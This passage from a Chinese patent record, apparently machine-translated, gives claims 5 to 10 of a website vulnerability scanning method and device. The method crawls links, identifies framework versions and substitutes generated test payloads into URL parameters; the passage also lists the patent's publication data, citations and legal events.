5. The website vulnerability scanning method of claim 1, wherein the updating key-value pairs in each link address with the available attack payload comprises:
for each crawled link address, performing a simulated click on the current link address to obtain the key-value pairs of the current link address;
and replacing the value in the key-value pair of the current link address with the available attack payload.
6. The website vulnerability scanning method according to claim 1, wherein the determining whether the target website has a vulnerability according to whether the execution effect of each updated link address meets expectations comprises:
determining that the target website has a vulnerability if the execution effect of at least one updated link address meets expectations.
7. The website vulnerability scanning method according to any one of claims 1 to 6, further comprising:
saving evidence when the target website has a vulnerability, and generating and outputting a scanning result.
8. A website vulnerability scanning device, comprising:
a link address crawling module, configured to crawl link addresses in a target website;
a development framework identification module, configured to identify a target development framework of the target website and a target framework version of the target development framework;
an attack payload generation module, configured to generate an available attack payload corresponding to a vulnerability of the target framework version;
a link address updating module, configured to update the key-value pairs in each link address with the available attack payload;
and a vulnerability scanning module, configured to determine whether the target website has a vulnerability according to whether the execution effect of each updated link address meets expectations.
9. A website vulnerability scanning apparatus, comprising:
a memory for storing a computer program;
a processor for implementing the steps of the website vulnerability scanning method according to any of claims 1 to 7 when executing the computer program.
10. A computer-readable storage medium, having a computer program stored thereon, which, when being executed by a processor, carries out the steps of the website vulnerability scanning method according to any of claims 1 to 7.
CN202110713874.1A 2021-06-25 2021-06-25 Website vulnerability scanning method, device, equipment and storage medium Pending CN113312633A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202110713874.1A CN113312633A (en) 2021-06-25 2021-06-25 Website vulnerability scanning method, device, equipment and storage medium

Publications (1)

Publication Number Publication Date
CN113312633A true CN113312633A (en) 2021-08-27

Family

ID=77380437

Country Status (1)

Country Link
CN (1) CN113312633A (en)

Citations (7)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN103632100A (en) * 2013-11-08 2014-03-12 北京奇虎科技有限公司 Method and device for detecting website bugs
CN104021074A (en) * 2014-05-16 2014-09-03 北京金山安全软件有限公司 Vulnerability detection method and device for application program of PhoneGap framework
CN107896219A (en) * 2017-11-29 2018-04-10 深信服科技股份有限公司 A kind of detection method, system and the relevant apparatus of website fragility
CN109933980A (en) * 2019-02-28 2019-06-25 北京长亭科技有限公司 A kind of vulnerability scanning method, apparatus and electronic equipment
CN109948334A (en) * 2019-03-26 2019-06-28 深信服科技股份有限公司 A kind of leak detection method, system and electronic equipment and storage medium
CN110995684A (en) * 2019-11-26 2020-04-10 西安四叶草信息技术有限公司 Vulnerability detection method and device
CN112579476A (en) * 2021-02-23 2021-03-30 北京北大软件工程股份有限公司 Method and device for aligning vulnerability and software and storage medium

Cited By (4)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN113992378A (en) * 2021-10-22 2022-01-28 绿盟科技集团股份有限公司 Safety monitoring method and device, electronic equipment and storage medium
CN113992378B (en) * 2021-10-22 2023-11-07 绿盟科技集团股份有限公司 Security monitoring method and device, electronic equipment and storage medium
CN114785581A (en) * 2022-04-14 2022-07-22 深圳开源互联网安全技术有限公司 Attack load generation method and device and computer readable storage medium
CN114785581B (en) * 2022-04-14 2023-08-11 深圳开源互联网安全技术有限公司 Attack load generation method and device and computer readable storage medium

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination